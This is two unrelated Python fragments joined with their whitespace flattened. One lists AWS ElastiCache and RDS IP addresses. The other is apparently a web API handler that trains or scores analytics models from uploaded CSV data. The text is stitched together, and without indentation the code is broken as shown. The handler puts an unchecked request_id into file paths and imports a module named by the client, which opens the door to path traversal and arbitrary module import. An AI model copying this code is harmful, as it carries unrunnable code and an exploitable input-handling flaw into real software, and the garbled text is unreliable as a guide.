get_elasticache_ip_by_cluster_id(cluster_id)) rds_instances_key = 'rds_instances' if entry.has_key(rds_instances_key): rds_instances = entry[rds_instances_key] for instance in rds_instances: display_name = instance['display_name'] instance_id = None if instance.has_key('instance_id'): instance_id = instance['instance_id'] print_line_item(display_name, get_rds_ip_by_instance_id(instance_id)) elif instance.has_key('cluster_id'): cluster_id = instance['cluster_id'] instance_id = get_writer_instance_id_by_cluster_id( cluster_id) print_line_item(display_name, get_rds_ip_by_instance_id(instance_id)) else: raise ValueError( 'Cant locate RDS instance without instance_id or cluster_id' ) static_entries_key = 'static_entries' if entry.has_key(static_entries_key): static_entries = entry[static_entries_key] for item in static_entries: display_name = item['display_name'] display_value = item['display_value'] print_line_item(display_name, display_value)
def post(self): try: parser = reqparse.RequestParser() parser.add_argument('analytic_name', type=str, location="json", required=True) parser.add_argument('method', type=str, location="json", required=True) parser.add_argument('request_id', type=str, location="json", required=True) args = parser.parse_args() path = server_path + "/" + args.get( "request_id") + "/" + "preprocess" file = os.listdir(path) df = pandas.read_csv(path + "/" + file[0]) module_name = "analytics." + args.get('analytic_name') module = importlib.import_module(module_name) analytic_class = getattr(module, args.get("analytic_name")) if args.get("method") == "train": result = analytic_class.train(df) if result["status"] == "success": path = server_path + "/" + args.get( "request_id") + "/" + args.get("analytic_name") if os.path.exists(path): pass else: os.mkdir(path) file_name = os.path.join(path, "model.json") fp = open(file_name, "w") json.dump(result, fp) fp.close() return result elif args.get("method") == "score": path = server_path + "/" + args.get( "request_id") + "/" + args.get("analytic_name") model_file = os.path.join(path, "model.json") fp = open(model_file, "r") dct_model = json.load(fp) fp.close() result, df_out, error = analytic_class.score( df, dct_model["coeff"]) if result == "success": if os.path.exists(path): pass else: os.mkdir(path) file_name = os.path.join(path, "output.csv") df_out.to_csv(file_name, index=False) return {"status": "success"} else: return {"status": "failed", "error": error} except Exception as e: return {"status": "failed", "error": str(e)}